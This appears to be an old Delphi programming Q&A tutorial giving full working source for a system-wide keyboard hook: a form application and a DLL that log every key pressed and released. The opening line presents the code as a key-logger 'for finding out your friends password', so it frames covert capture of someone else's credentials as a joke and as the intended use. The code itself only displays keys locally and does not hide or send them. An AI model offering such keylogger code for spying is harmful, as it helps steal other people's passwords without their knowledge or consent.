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Keyboard hooks demo

Title: Keyboard hooks demo Question: How to get keys system-wide? Answer: If you want to make a key-logger for finding out your friends password :) you will soon find out that you form needs to be focussed to receive keys via the onKeyPress event or so. What you need to do, is create a Hook. In the case of a key-logger, you can call it a system-wide replacement of the onKeyDown and -up event. And that's exactly what it does. If you press a key, a line will be added to a memo saying whether you pressed, released or repressed a key. Let's take a look at the code: { . . . } const DLLName = 'HookTeclado.dll'; CM_MANDA_TECLA = WM_USER + $1000; type THookTeclado=procedure; stdcall; type TForm1 = class(TForm) Memo1: TMemo; procedure FormCreate(Sender: TObject); procedure FormDestroy(Sender: TObject); procedure Button1Click(Sender: TObject); private { Private declarations } MyHandle : THandle; PReceptor : ^Integer; HandleDLL : THandle; HookOn, HookOff : THookTeclado; procedure LlegaDelHook(var message: TMessage); message CM_MANDA_TECLA; public { Public declarations } end; var Form1: TForm1; implementation uses Unit2; {$R *.DFM} procedure TForm1.FormCreate(Sender: TObject); begin // Don't get an extra line in the memo... Memo1.ReadOnly := True; // Try loading the DLL HandleDLL := LoadLibrary( PChar(ExtractFilePath(Application.Exename)+DLLName ) ); if HandleDLL = 0 then raise Exception.Create('DLL not found'); @HookOn := GetProcAddress(HandleDLL, 'HookOn'); @HookOff := GetProcAddress(HandleDLL, 'HookOff'); If not assigned(HookOn) or not assigned(HookOff) then raise Exception.Create('Can''t find the required DLL functions'); MyHandle := CreateFileMapping( $FFFFFFFF, nil, PAGE_READWRITE, 0, SizeOf(Integer), 'ElReceptor'); if MyHandle = 0 then raise Exception.Create( 'Error while creating file'); PReceptor := MapViewOfFile(MyHandle,FILE_MAP_WRITE,0,0,0); PReceptor^ := Handle; HookOn; end; procedure TForm1.LlegaDelHook(var message: TMessage); var NombreTecla : array[0..100] of char; Accion : string; begin // Get virtual keycode to key name GetKeyNameText(Message.LParam,@NombreTecla,100); // Look if the key was pressed, released or re-pressed if ((Message.lParam shr 31) and 1)=1 then Accion:='Released' {Released} else if ((Message.lParam shr 30) and 1)=1 then Accion:='RePressed' {repressed} else Accion:='Pressed'; {pressed} Memo1.Lines.Append( Accion+' key: '+String(NombreTecla) ); end; procedure TForm1.FormDestroy(Sender: TObject); begin // Uninstall the Hook if Assigned(HookOff) then HookOff; // Free the DLL if HandleDLL0 then FreeLibrary(HandleDLL); // Close the memfile and the View if MyHandle 0 then begin UnmapViewOfFile(PReceptor); CloseHandle(MyHandle); end; end; end. As you can see, we load a dll in the OnCreate event and unload it in the OnDestroy event of the form. The LlegadelHook procedure is called whenever a key is pressed. Let's take a look at the DLL code: library Project1; uses Windows, Messages; const CM_MANDA_TECLA = WM_USER + $1000; var HookDeTeclado : HHook; FicheroM : THandle; PReceptor : ^Integer; function CallBackDelHook( Code : Integer; wParam : WPARAM; lParam : LPARAM ) : LRESULT; stdcall; {This is the CallBack function called by he Hook} begin {if a key was pressed/released} if code=HC_ACTION then begin {if the mapfile exists} FicheroM:=OpenFileMapping(FILE_MAP_READ,False,'ElReceptor'); {If dont, send nothing to receiver application} if FicheroM0 then begin PReceptor:=MapViewOfFile(FicheroM,FILE_MAP_READ,0,0,0); PostMessage(PReceptor^,CM_MANDA_TECLA,wParam,lParam); UnmapViewOfFile(PReceptor); CloseHandle(FicheroM); end; end; {call to next hook of the chain} Result := CallNextHookEx(HookDeTeclado, Code, wParam, lParam) end; procedure HookOn; stdcall; {procedure for install the hook} begin HookDeTeclado:=SetWindowsHookEx(WH_KEYBOARD, @CallBackDelHook, HInstance , 0); end; procedure HookOff; stdcall; begin {procedure to uninstall the hook} UnhookWindowsHookEx(HookDeTeclado); end; exports {Export the procedures} HookOn, HookOff; begin end. It's as simple as that! If you want to download the Delphi 5 project, go to . // Charl (